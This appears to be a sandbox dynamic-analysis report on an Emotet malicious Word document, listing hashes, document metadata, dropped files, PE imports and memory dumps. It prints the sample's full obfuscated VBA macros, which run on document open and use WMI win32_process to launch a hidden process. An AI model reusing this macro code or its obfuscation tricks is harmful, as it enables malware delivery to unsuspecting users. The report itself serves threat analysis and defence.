0c23d02d...ea44 | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Spyware
Threat Names:
Emotet
Generic.EmotetU.C1B1709D
Gen:Variant.Razy.494038
...

Remarks

(0x0200000C): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\sample.doc Sample File Word Document
Malicious
Mime Type application/msword
File Size 296.43 KB
MD5 2a14b3778299e0f147f8d6e93ad1fa4f
SHA1 2b4ab607f4cc2ba39d223ad27203d7bac4a3c4c2
SHA256 0c23d02d9bdfeff59ce2b2af56e357be4dcef9a08d157a380599d305dcb9ea44
SSDeep 6144:90Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+NXdxypi8wgHOHK20ujA6gNuzp:90E3dxtR/iU9mvUPrx98wgHOHK20ujA0
ImpHash None
Parser Error Remark Static engine was unable to completely parse the analyzed file
Office Information
Title Eaque.
Creator Romain Lambert
Revision 1
Create Time 2020-01-21 17:53:00+00:00
Modify Time 2020-01-21 17:53:00+00:00
Document Information
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 4
Character Count 28
Chars With Spaces 31
scale_crop False
shared_doc False
Controls (2)
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
{6E182020-F460-11CE-9BCD-00AA00608E01} FormsFrame -
VBA Macros (2)
Macro #1: Halpaohsi
Attribute VB_Name = "Halpaohsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Phffmgfhyakn
End Sub
Macro #2: Tslcncqezxxw
Attribute VB_Name = "Tslcncqezxxw"
Function Cxwtfasbi()
   For Ummppcjymvmfw = rgfasd To Mbeqdzhakotiy
         ewr = dsf - CVar(er * 23)
                     Ozuiphpxdsni = CSng(Qrwnlqfsd)
            Nmbbvukqshnko = CLng(Wdbxpruutww)
            Next
     If er > Rowwwmbvov Then
         gggs = Sin(3)
                     Crtydgixxtbqg = Srhezzyzd
            Obosihuynzb = CByte(8 - CSng(3))
End If
      If sdf > Qoxoxmfqohi Then
         wer3 = Sin(1)
                     Rizesqnmr = Fluwhufrur
            Bjbqfaaufo = CByte(234 - CSng(3))
End If
For Lzjhkjdzioj = rgfasd To Jitbrjpcxxuq
         ewr = dsf - CDbl(er * 23)
                     Mrldqjdkh = CSng(Glnpbnapywrgt)
            Mnoboqlbr = CLng(Ksdpybickxbnw)
            Next
Psyxizhgdtcsr = I + ChrW(wdKeyP)
   For Haeiuvmwpueta = rgfasd To Arbtkeldv
         ewr = dsf - CVar(er * 23)
                     Hiccshwszmljt = CSng(Fujgvdcvsutfz)
            Xjywoetnbxxhl = CLng(Ihllyquooue)
            Next
     If er > Izbxxepbkx Then
         gggs = Sin(3)
                     Lhhiywradmlu = Fcukckrjebwzk
            Nxjrqnimf = CByte(8 - CSng(3))
End If
      If sdf > Mmhwnhjbymhav Then
         wer3 = Sin(1)
                     Cdfmzmku = Cdwiwqouexe
            Ooqiitfwo = CByte(234 - CSng(3))
End If
For Kfgsqlcrrhl = rgfasd To Scwsgrmzau
         ewr = dsf - CDbl(er * 23)
                     Idbbksnwjyqjw = CSng(Unkbckdpgwnq)
            Njlouhiaphoy = CLng(Ulnwcysm)
            Next
Xgnhnban = Psyxizhgdtcsr + Xvzwvdjxjbaph.Dmhwktuoqw + Xvzwvdjxjbaph.Mspgvegbrck
   For Rvikdnfkowx = rgfasd To Pexrfnlrx
         ewr = dsf - CVar(er * 23)
                     Zkbugpnmcl = CSng(Fgwgodgxxm)
            Oceredxtuxksl = CLng(Yjkztktr)
            Next
     If er > Gwoqdombd Then
         gggs = Sin(3)
                     Lvhzokpi = Vdzinmnqm
            Tjyhjdriyr = CByte(8 - CSng(3))
End If
      If sdf > Znocaeaej Then
         wer3 = Sin(1)
                     Lsoiqbzl = Trmjrfhyzx
            Zauzknlmqbe = CByte(234 - CSng(3))
End If
For Ouubhzfqsg = rgfasd To Siztfjrq
         ewr = dsf - CDbl(er * 23)
                     Onqrmzevrnhx = CSng(Mxsyhxgtzy)
            Mtksnonv = CLng(Kpnflxoit)
            Next
sss = Xvzwvdjxjbaph.Srghtmcdobug.GroupName
Hsiszpxdwvzre = Split(Xgnhnban + CStr(Trim(sss)), "=mmuusns=")
   For Nfkmwqidjzol = rgfasd To Myxgwvdlvca
         ewr = dsf - CVar(er * 23)
                     Cmpcqnaabwc = CSng(Okukbnajspyqw)
            Ckimrzgruwx = CLng(Olcvaxgtq)
            Next
     If er > Meijwqlu Then
         gggs = Sin(3)
                     Xroqozisan = Tuhndpzlxly
            Nqwudkccxqtne = CByte(8 - CSng(3))
End If
      If sdf > Xaqxvylncjnwu Then
         wer3 = Sin(1)
                     Msgrajmywc = Veozzccnwv
            Bcdulqoisl = CByte(234 - CSng(3))
End If
For Hmmolctu = rgfasd To Pjnjnuswoq
         ewr = dsf - CDbl(er * 23)
                     Qyfsngotujzn = CSng(Qnbubgtpmu)
            Ctpvwnjn = CLng(Itpngzrfjar)
            Next
Cxwtfasbi = Join(Hsiszpxdwvzre, "")
   For Hacdoyen = rgfasd To Wpojmowng
         ewr = dsf - CVar(er * 23)
                     Vbahfauijsvq = CSng(Mlxwizrpyfmr)
            Vrrldgmybw = CLng(Kfcpazorzcyqx)
            Next
     If er > Gcvuopin Then
         gggs = Sin(3)
                     Kmsfnkbn = Mmjenctmttb
            Cgwgbuicsk = CByte(8 - CSng(3))
End If
      If sdf > Mvllswcmdqt Then
         wer3 = Sin(1)
                     Hlvvtyzwbqz = Ztcmucuo
            Haaxybhmm = CByte(234 - CSng(3))
End If
For Uimgymptkfm = rgfasd To Wijrwrzcgeo
         ewr = dsf - CDbl(er * 23)
                     Bavudnppflpg = CSng(Evpbvgmaqsp)
            Cmodykflpyqb = CLng(Yrxukzavh)
            Next
End Function
Function Phffmgfhyakn()
dv = "in=mmuusns==mmuusns==mmuusns=mgm=mmuusns==mmuusns==mmuusns=t" + ChrW(wdKeyS) + ":=mmuusns==mmuusns=win=mmuusns==mmuusns=32=mmuusns==mmuusns=_" + Xvzwvdjxjbaph.Rghedtey + "r=mmuusns==mmuusns=oc=mmuusns==mmuusns==mmuusns=ess=mmuusns==mmuusns="
   For Irhevqhybvg = rgfasd To Hhsopmqko
         ewr = dsf - CVar(er * 23)
                     Gqorawher = CSng(Akmkjqycb)
            Ftjcvmavdu = CLng(Xebpxfoc)
            Next
     If er > Bhhbfdzmlwuvk Then
         gggs = Sin(3)
                     Ybudwflhk = Hbaxnkhhr
            Ugxvriwfbtgh = CByte(8 - CSng(3))
End If
      If sdf > Tyisqaxl Then
         wer3 = Sin(1)
                     Ylojknddfchng = Dkenlatatum
            Bbxigbxfunv = CByte(234 - CSng(3))
End If
For Dbwwfrhenpt = rgfasd To Uelupxopcdf
         ewr = dsf - CDbl(er * 23)
                     Fdiixjzvx = CSng(Xourjome)
            Gsuayxaabxry = CLng(Eweskxtxmh)
            Next
fd = "=mmuusns="
   For Ioqelyua = rgfasd To Iltypfpqhc
         ewr = dsf - CVar(er * 23)
                     Czlgcqoovlkq = CSng(Maqsbzzgnbm)
            Zzkomcpm = CLng(Ewemunwacryt)
            Next
     If er > Oaxtvmkuhmppk Then
         gggs = Sin(3)
                     Nrdvhlwxnetra = Ffkkzlfw
            Ikpsweczc = CByte(8 - CSng(3))
End If
      If sdf > Uxhosdkpcvkkd Then
         wer3 = Sin(1)
                     Fzxniunrya = Qzrryvdkh
            Hhvhojyallnzc = CByte(234 - CSng(3))
End If
For Gfhginlxtpl = rgfasd To Pawccdpfnn
         ewr = dsf - CDbl(er * 23)
                     Zauudzoqj = CSng(Cbujwjbrdgnll)
            Wzlisriyim = CLng(Qpwmbabu)
            Next
Jmtxjlisob = Split("=mmuusns==mmuusns==mmuusns==mmuusns==mmuusns=w" + dv + T, fd)
   For Fqyzinoym = rgfasd To Pultigwfb
         ewr = dsf - CVar(er * 23)
                     Uvilpzyvlnj = CSng(Eynhnfqvqvjr)
            Afskklpwdqwx = CLng(Qztgcspk)
            Next
     If er > Svfuezzutfy Then
         gggs = Sin(3)
                     Dygdivwkpqqf = Cpdeqnes
            Vsdrcejca = CByte(8 - CSng(3))
End If
      If sdf > Hvogovdcfoo Then
         wer3 = Sin(1)
                     Wfpbicnlkaiqr = Kgoeilvtpx
            Apjqgegvwpiu = CByte(234 - CSng(3))
End If
For Fxugqwpusyak = rgfasd To Bladgknwak
         ewr = dsf - CDbl(er * 23)
                     Lklvytgpgy = CSng(Hecfwlqwa)
            Lpfnogiwkfel = CLng(Wagepfcmrv)
            Next
Mbxypfjaagzo = Join(Jmtxjlisob, "")
   For Fgpbircvm = rgfasd To Fmsrpghx
         ewr = dsf - CVar(er * 23)
                     Vuhylhkc = CSng(Zbhvwkzbssq)
            Qtqshshb = CLng(Eklhdwjs)
            Next
     If er > Tddfxufhgfm Then
         gggs = Sin(3)
                     Qrfvpckqotyck = Weiaxikm
            Umnavartnu = CByte(8 - CSng(3))
End If
      If sdf > Atpizekfcmjck Then
         wer3 = Sin(1)
                     Lnogfpkvqwqtt = Xqmydplpjf
            Iidlptdfgz = CByte(234 - CSng(3))
End If
For Jqyzmjlqyt = rgfasd To Pmxhzxebdebm
         ewr = dsf - CDbl(er * 23)
                     Azpacydcpn = CSng(Datllptkvc)
            Fjulgeolmbila = CLng(Qpmxkqnteis)
            Next
Set Nbjlfulfh = GetObject(Mbxypfjaagzo)
   For Dlaqwtsa = rgfasd To Xedfhncc
         ewr = dsf - CVar(er * 23)
                     Nszuzkhonwyb = CSng(Esmykmztsyfik)
            Jlmjomkmgrm = CLng(Mzgwzdbp)
            Next
     If er > Susuaaoq Then
         gggs = Sin(3)
                     Ydklspmt = Hxbwgssjj
            Aihuowsk = CByte(8 - CSng(3))
End If
      If sdf > Bmhejovdjrhj Then
         wer3 = Sin(1)
                     Utwoiiehucyvd = Tujvnglt
            Dxgzpurnlzvzd = CByte(234 - CSng(3))
End If
For Otsfgnle = rgfasd To Wxohpjzfrel
         ewr = dsf - CDbl(er * 23)
                     Ehgirqiuq = CSng(Zmtokjrsgjsw)
            Vqwtmxrpl = CLng(Afunrvgqvicpk)
            Next
Epuodgcp = Xvzwvdjxjbaph.Qgnmwpcsosft.Tag
Nwlspbgev = Mbxypfjaagzo + ChrW(wdKeyS) + Xvzwvdjxjbaph.Hmqtdcvzqfs.Tag + Epuodgcp
   For Jznxrrsnztkw = rgfasd To Icwwpescgsond
         ewr = dsf - CVar(er * 23)
                     Erxqtqfhjlgio = CSng(Rongvkdbb)
            Hsvjeocpvcmgh = CLng(Unliveda)
            Next
     If er > Zxtnbpwktjmmz Then
         gggs = Sin(3)
                     Fyddfifxsppq = Vdrvjeqicu
            Voyqineppgz = CByte(8 - CSng(3))
End If
      If sdf > Rtabxlzczygu Then
         wer3 = Sin(1)
                     Ccxvjromryb = Mdupeuar
            Geinnwqsvrw = CByte(234 - CSng(3))
End If
For Skqfgfcbaqk = rgfasd To Fibaqzrlqqada
         ewr = dsf - CDbl(er * 23)
                     Ffpekqbe = CSng(Tlhogoyaorh)
            Bxjbctpbgpbw = CLng(Fciddnlx)
            Next
Fhmdqkvcai = Nwlspbgev + Xvzwvdjxjbaph.Rghedtey
   For Lazvwlklomuqv = rgfasd To Bfspfsvlezbl
         ewr = dsf - CVar(er * 23)
                     Djsngryqnjtae = CSng(Oiegnsfwcze)
            Uwuaonkcccp = CLng(Lsjvfoyypqxe)
            Next
     If er > Ynpocckwr Then
         gggs = Sin(3)
                     Mrmkmfpwshnm = Pqqefxvfhmpm
            Ilpbuctxmnc = CByte(8 - CSng(3))
End If
      If sdf > Hqxkajuml Then
         wer3 = Sin(1)
                     Lrxgjauarbo = Msdasecbtpnp
            Pcubwrxp = CByte(234 - CSng(3))
End If
For Moltcugti = rgfasd To Ifttgrprbkqyy
         ewr = dsf - CDbl(er * 23)
                     Xarpuxozndsjz = CSng(Ugfdhwahqz)
            Buwpnoewfbtka = CLng(Gqniqrspk)
            Next
Set Phffmgfhyakn = GetObject(Fhmdqkvcai)
   For Pudwquipw = rgfasd To Twkbeeebb
         ewr = dsf - CVar(er * 23)
                     Ujelxdldnb = CSng(Mdvwekrpwmxwg)
            Gqygnvgaure = CLng(Dsnfyyxxi)
            Next
     If er > Rjumimhfpmemp Then
         gggs = Sin(3)
                     Dfdbfannl = Ryhjtxiypdaus
            Ygrzfxjqvr = CByte(8 - CSng(3))
End If
      If sdf > Czdwihiuj Then
         wer3 = Sin(1)
                     Theqgdcll = Bgvmybihmszq
            Lhsmjmabayrbh = CByte(234 - CSng(3))
End If
For Sgiohxwawj = rgfasd To Bkntqyquwk
         ewr = dsf - CDbl(er * 23)
                     Guagwuxt = CSng(Umrcycpgwdca)
            Mfbdrjqhhfh = CLng(Qdblnhgqbcozo)
            Next
Phffmgfhyakn. _
showwindow = False
   For Egpwnmsp = rgfasd To Nziwmlcoxazlv
         ewr = dsf - CVar(er * 23)
                     Dlzspewhcf = CSng(Nucpbesqtki)
            Qnsmbtkrlk = CLng(Xftrsgrexptv)
            Next
     If er > Hchrsdrjzrdva Then
         gggs = Sin(3)
                     Xbkcwdyzzaerd = Txacliku
            Angcnxffhzojt = CByte(8 - CSng(3))
End If
      If sdf > Jdhqnloxyxfu Then
         wer3 = Sin(1)
                     Pmgsewqrwmdzl = Mjemhcecdd
            Qiehdggsmh = CByte(234 - CSng(3))
End If
For Rergvnoatkm = rgfasd To Hrwkkdpt
         ewr = dsf - CDbl(er * 23)
                     Jreasfdzetqvc = CSng(Hqplsfvqgvpji)
            Bvhehprnv = CLng(Livkmolmdma)
            Next
Do While Nbjlfulfh. _
Create(er & Cxwtfasbi, Ttfwoikclybkw, Phffmgfhyakn, Anrwyrkpnf)
Loop
   For Prlhuwaksj = rgfasd To Rzvqamgzdxk
         ewr = dsf - CVar(er * 23)
                     Eyhuwmtjqih = CSng(Vlydskeg)
            Lodfalishvsq = CLng(Pvxzearoearu)
            Next
     If er > Fzmjugwf Then
         gggs = Sin(3)
                     Sxiqzqifo = Wmfbjbwkdog
            Nhiivrvkc = CByte(8 - CSng(3))
End If
      If sdf > Gsbonslgu Then
         wer3 = Sin(1)
                     Nhhlezvpr = Zcsizjxkcuv
            Qaiwkczpvfub = CByte(234 - CSng(3))
End If
For Mvomzustyw = rgfasd To Bjjjnsimuerz
         ewr = dsf - CDbl(er * 23)
                     Myexxgyzkpo = CSng(Ecxcmqraqflr)
            Ppiephkhuoby = CLng(Cyuvewejxcfi)
            Next
End Function


Document Content
c:\users\aetadzjz\appdata\local\temp\~dfc9208b8177d1ee10.tmp Dropped File Unknown
Whitelisted
Mime Type application/CDFV2
File Size 1.50 KB
MD5 72f5c05b7ea8dd6059bf59f50b22df33
SHA1 d5af52e129e15e3a34772806f6c5fbf132e7408e
SHA256 1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164
SSDeep 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
ImpHash None
File Reputation Information
Severity
Whitelisted
First Seen 2013-03-17 16:11 (UTC+1)
Last Seen 2019-02-22 02:24 (UTC+1)
c:\users\aetadzjz\appdata\local\temp\~df7fae8046229cf905.tmp Dropped File Stream
Whitelisted
Also Known As c:\users\aetadzjz\appdata\local\temp\~df1fc9d1914fcb9da0.tmp (Dropped File)
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep 3::
ImpHash None
File Reputation Information
Severity
Whitelisted
First Seen 2011-07-06 01:20 (UTC+2)
Last Seen 2019-12-06 01:08 (UTC+1)
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduckb.exe Dropped File Binary
Whitelisted
Also Known As C:\Users\aETAdzjz\AppData\Local\sendduck\sendducka.exe (Dropped File)
Mime Type application/vnd.microsoft.portable-executable
File Size 77.50 KB
MD5 3290d6946b5e30e70414990574883ddb
SHA1 be0144e3235ffde0787e9f1cd34c828ec87d8e19
SHA256 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663
SSDeep 1536:4Dfm8/DhQ/65oIFM8oWcwnLUq0Sjw0hkFNaH3:G7Lm/6ohWc4oq0u7kn
ImpHash 1f6cbfb8aa32847b01fd3e7e70d29d61
File Reputation Information
Severity
Whitelisted
First Seen 2012-10-01 02:48 (UTC+2)
Last Seen 2019-12-02 13:40 (UTC+1)
PE Information
Image Base 0x100000000
Entry Point 0x10000bdfc
Size Of Code 0xf800
Size Of Initialized Data 0x4400
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.amd64
Compile Timestamp 2009-07-14 00:08:46+00:00
Version Information (8)
CompanyName Microsoft Corporation
FileDescription Application Layer Gateway Service
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
InternalName ALG.exe
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename ALG.exe
ProductName Microsoft® Windows® Operating System
ProductVersion 6.1.7600.16385
Sections (5)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x100001000 0xf7fe 0xf800 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.98
.data 0x100011000 0xe18 0x600 0xfc00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 2.36
.pdata 0x100012000 0xfa8 0x1000 0x10200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.58
.rsrc 0x100013000 0x1fc8 0x2000 0x11200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.5
.reloc 0x100015000 0x28a 0x400 0x13200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 2.9
Imports (9)
ADVAPI32.dll (9)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetServiceStatus 0x0 0x100001000 0xfcf8 0xf0f8 0x2c0
RegisterServiceCtrlHandlerW 0x0 0x100001008 0xfd00 0xf100 0x288
RegNotifyChangeKeyValue 0x0 0x100001010 0xfd08 0xf108 0x25d
RegCloseKey 0x0 0x100001018 0xfd10 0xf110 0x230
RegOpenKeyExW 0x0 0x100001020 0xfd18 0xf118 0x261
StartServiceCtrlDispatcherW 0x0 0x100001028 0xfd20 0xf120 0x2c8
RegQueryValueExW 0x0 0x100001030 0xfd28 0xf128 0x26e
RegEnumKeyExW 0x0 0x100001038 0xfd30 0xf130 0x24f
SystemFunction036 0x0 0x100001040 0xfd38 0xf138 0x2f1
KERNEL32.dll (36)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateEventW 0x0 0x100001088 0xfd80 0xf180 0x85
WaitForMultipleObjects 0x0 0x100001090 0xfd88 0xf188 0x506
Sleep 0x0 0x100001098 0xfd90 0xf190 0x4c0
HeapSetInformation 0x0 0x1000010a0 0xfd98 0xf198 0x2db
WaitForSingleObject 0x0 0x1000010a8 0xfda0 0xf1a0 0x508
SetEvent 0x0 0x1000010b0 0xfda8 0xf1a8 0x467
CreateThread 0x0 0x1000010b8 0xfdb0 0xf1b0 0xb4
CreateTimerQueueTimer 0x0 0x1000010c0 0xfdb8 0xf1b8 0xbc
DeleteTimerQueueTimer 0x0 0x1000010c8 0xfdc0 0xf1c0 0xdb
GetCurrentProcessId 0x0 0x1000010d0 0xfdc8 0xf1c8 0x1c7
DuplicateHandle 0x0 0x1000010d8 0xfdd0 0xf1d0 0xec
GetCurrentProcess 0x0 0x1000010e0 0xfdd8 0xf1d8 0x1c6
RaiseException 0x0 0x1000010e8 0xfde0 0xf1e0 0x3b4
EnterCriticalSection 0x0 0x1000010f0 0xfde8 0xf1e8 0xf2
LeaveCriticalSection 0x0 0x1000010f8 0xfdf0 0xf1f0 0x33b
WriteFile 0x0 0x100001100 0xfdf8 0xf1f8 0x534
ReadFile 0x0 0x100001108 0xfe00 0xf200 0x3c3
BindIoCompletionCallback 0x0 0x100001110 0xfe08 0xf208 0x39
CloseHandle 0x0 0x100001118 0xfe10 0xf210 0x52
GetProcessHeap 0x0 0x100001120 0xfe18 0xf218 0x251
HeapAlloc 0x0 0x100001128 0xfe20 0xf220 0x2d3
UnhandledExceptionFilter 0x0 0x100001130 0xfe28 0xf228 0x4e2
TerminateProcess 0x0 0x100001138 0xfe30 0xf230 0x4ce
GetSystemTimeAsFileTime 0x0 0x100001140 0xfe38 0xf238 0x280
GetCurrentThreadId 0x0 0x100001148 0xfe40 0xf240 0x1cb
GetTickCount 0x0 0x100001150 0xfe48 0xf248 0x29a
QueryPerformanceCounter 0x0 0x100001158 0xfe50 0xf250 0x3a9
GetModuleHandleW 0x0 0x100001160 0xfe58 0xf258 0x21e
SetUnhandledExceptionFilter 0x0 0x100001168 0xfe60 0xf260 0x4b3
GetStartupInfoW 0x0 0x100001170 0xfe68 0xf268 0x26a
InitializeCriticalSection 0x0 0x100001178 0xfe70 0xf270 0x2ea
DeleteCriticalSection 0x0 0x100001180 0xfe78 0xf278 0xd2
DeleteTimerQueueEx 0x0 0x100001188 0xfe80 0xf280 0xda
CreateTimerQueue 0x0 0x100001190 0xfe88 0xf288 0xbb
GetLastError 0x0 0x100001198 0xfe90 0xf290 0x208
HeapFree 0x0 0x1000011a0 0xfe98 0xf298 0x2d7
msvcrt.dll (38)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
_unlock 0x0 0x100001260 0xff58 0xf358 0x330
_lock 0x0 0x100001268 0xff60 0xf360 0x1d5
?terminate@@YAXXZ 0x0 0x100001270 0xff68 0xf368 0x30
memset 0x0 0x100001278 0xff70 0xf370 0x484
_onexit 0x0 0x100001280 0xff78 0xf378 0x27f
??1type_info@@UEAA@XZ 0x0 0x100001288 0xff80 0xf380 0x12
__dllonexit 0x0 0x100001290 0xff88 0xf388 0x6d
__set_app_type 0x0 0x100001298 0xff90 0xf390 0x80
_fmode 0x0 0x1000012a0 0xff98 0xf398 0x118
__setusermatherr 0x0 0x1000012a8 0xffa0 0xf3a0 0x82
_amsg_exit 0x0 0x1000012b0 0xffa8 0xf3a8 0xa0
_initterm 0x0 0x1000012b8 0xffb0 0xf3b0 0x16c
_wcmdln 0x0 0x1000012c0 0xffb8 0xf3b8 0x371
exit 0x0 0x1000012c8 0xffc0 0xf3c0 0x420
_cexit 0x0 0x1000012d0 0xffc8 0xf3c8 0xb3
_exit 0x0 0x1000012d8 0xffd0 0xf3d0 0xff
_XcptFilter 0x0 0x1000012e0 0xffd8 0xf3d8 0x52
__C_specific_handler 0x0 0x1000012e8 0xffe0 0xf3e0 0x53
__wgetmainargs 0x0 0x1000012f0 0xffe8 0xf3e8 0x8f
__CxxFrameHandler3 0x0 0x1000012f8 0xfff0 0xf3f0 0x57
_callnewh 0x0 0x100001300 0xfff8 0xf3f8 0xb1
malloc 0x0 0x100001308 0x10000 0xf400 0x474
_CxxThrowException 0x0 0x100001310 0x10008 0xf408 0x4c
??0exception@@QEAA@AEBQEBDH@Z 0x0 0x100001318 0x10010 0xf410 0xb
memmove 0x0 0x100001320 0x10018 0xf418 0x482
realloc 0x0 0x100001328 0x10020 0xf420 0x497
??0exception@@QEAA@XZ 0x0 0x100001330 0x10028 0xf428 0xd
memmove_s 0x0 0x100001338 0x10030 0xf430 0x483
memcpy_s 0x0 0x100001340 0x10038 0xf438 0x481
_wcsicmp 0x0 0x100001348 0x10040 0xf440 0x379
free 0x0 0x100001350 0x10048 0xf448 0x43a
?what@exception@@UEBAPEBDXZ 0x0 0x100001358 0x10050 0xf450 0x32
??0exception@@QEAA@AEBV0@@Z 0x0 0x100001360 0x10058 0xf458 0xc
isdigit 0x0 0x100001368 0x10060 0xf460 0x454
??1exception@@UEAA@XZ 0x0 0x100001370 0x10068 0xf468 0x11
??0exception@@QEAA@AEBQEBD@Z 0x0 0x100001378 0x10070 0xf470 0xa
_commode 0x0 0x100001380 0x10078 0xf478 0xc4
memcpy 0x0 0x100001388 0x10080 0xf480 0x480
ATL.DLL (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0x11 0x100001050 0xfd48 0xf148 -
(by ordinal) 0x10 0x100001058 0xfd50 0xf150 -
(by ordinal) 0x20 0x100001060 0xfd58 0xf158 -
(by ordinal) 0x17 0x100001068 0xfd60 0xf160 -
(by ordinal) 0x14 0x100001070 0xfd68 0xf168 -
(by ordinal) 0x15 0x100001078 0xfd70 0xf170 -
WS2_32.dll (15)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
htons 0x9 0x1000011c8 0xfec0 0xf2c0 -
getpeername 0x5 0x1000011d0 0xfec8 0xf2c8 -
getsockname 0x6 0x1000011d8 0xfed0 0xf2d0 -
bind 0x2 0x1000011e0 0xfed8 0xf2d8 -
WSASocketW 0x0 0x1000011e8 0xfee0 0xf2e0 0x53
socket 0x17 0x1000011f0 0xfee8 0xf2e8 -
closesocket 0x3 0x1000011f8 0xfef0 0xf2f0 -
ntohs 0xf 0x100001200 0xfef8 0xf2f8 -
WSAIoctl 0x0 0x100001208 0xff00 0xf300 0x36
listen 0xd 0x100001210 0xff08 0xf308 -
htonl 0x8 0x100001218 0xff10 0xf310 -
setsockopt 0x15 0x100001220 0xff18 0xf318 -
WSAStartup 0x73 0x100001228 0xff20 0xf320 -
WSACleanup 0x74 0x100001230 0xff28 0xf328 -
WSAGetLastError 0x6f 0x100001238 0xff30 0xf330 -
ole32.dll (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoTaskMemFree 0x0 0x1000013b8 0x100b0 0xf4b0 0x6c
CoTaskMemAlloc 0x0 0x1000013c0 0x100b8 0xf4b8 0x6b
CoUninitialize 0x0 0x1000013c8 0x100c0 0xf4c0 0x70
CoInitializeEx 0x0 0x1000013d0 0x100c8 0xf4c8 0x43
CLSIDFromString 0x0 0x1000013d8 0x100d0 0xf4d0 0xc
CoCreateInstance 0x0 0x1000013e0 0x100d8 0xf4d8 0x14
OLEAUT32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysAllocString 0x2 0x1000011b0 0xfea8 0xf2a8 -
SysFreeString 0x6 0x1000011b8 0xfeb0 0xf2b0 -
ntdll.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RtlCaptureContext 0x0 0x100001398 0x10090 0xf490 0x27b
RtlLookupFunctionEntry 0x0 0x1000013a0 0x10098 0xf498 0x401
RtlVirtualUnwind 0x0 0x1000013a8 0x100a0 0xf4a0 0x4f0
WSOCK32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ord1141 0x475 0x100001248 0xff40 0xf340 -
ord1142 0x476 0x100001250 0xff48 0xf348 -
Memory Dumps (9)
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
buffer 22 0x140000000 0x140022FFF First Execution True 64-bit 0x140006B54 True True
sendduckb.exe 22 0xFF7E0000 0xFF7F5FFF Relevant Image True 64-bit - False False
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x140007784 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000A9F8 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000B9B4 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000C5E0 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000D88C True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x1400046C0 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x140005600 True True
c:\users\aetadzjz\appdata\local\temp\~df5c3c42457c3f014b.tmp Dropped File Unknown
Unknown
Mime Type application/CDFV2
File Size 20.00 KB
MD5 2ada0850f5ce89a641f4207ebf5aeb41
SHA1 640e2fcae59fcc5188df28c24df5d883e1103a30
SHA256 69d486c23baf74048d0e18bd57b6e7bb331cedf18de001d899f32cdbc6bee4f6
SSDeep 96:wQB+wm9fmffwMGjIBdaB1uM1dm5Gf1uGNLZJZAAsY/k1BCV5oC/C2Ol48YXuhESt:wQM5wnAHK+i4iAfQjOq3p
ImpHash None
c:\users\aetadzjz\appdata\local\temp\~df207c8c2a9159a39e.tmp Dropped File Unknown
Unknown
Mime Type application/CDFV2
File Size 20.00 KB
MD5 0442563f0615a2a47129af39e9c57547
SHA1 70e70adbc9e6278a1216b86ec7ed20766e904608
SHA256 672acd86cccc0f4290a5f3a3a2435734533fc8b32cda3ff7b73ea2ac5e626c92
SSDeep 96:woB+wm9fmffwMGjIBdaB1uM1dm5Gf1uGNLZJZAAsY/k1BCV5oC/C2Ol48YXuhESB:woM5wnAHK+i4iAfQjOqjp
ImpHash None
11a8f947339d30605a086d0c8865366567767e0354baaf83a941c484b7cb297b Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 1.16 KB
MD5 db1a53e3909e68a32ccc3524ca931c06
SHA1 8b783b113335946b5db104e20a4e6182259ccc28
SHA256 11a8f947339d30605a086d0c8865366567767e0354baaf83a941c484b7cb297b
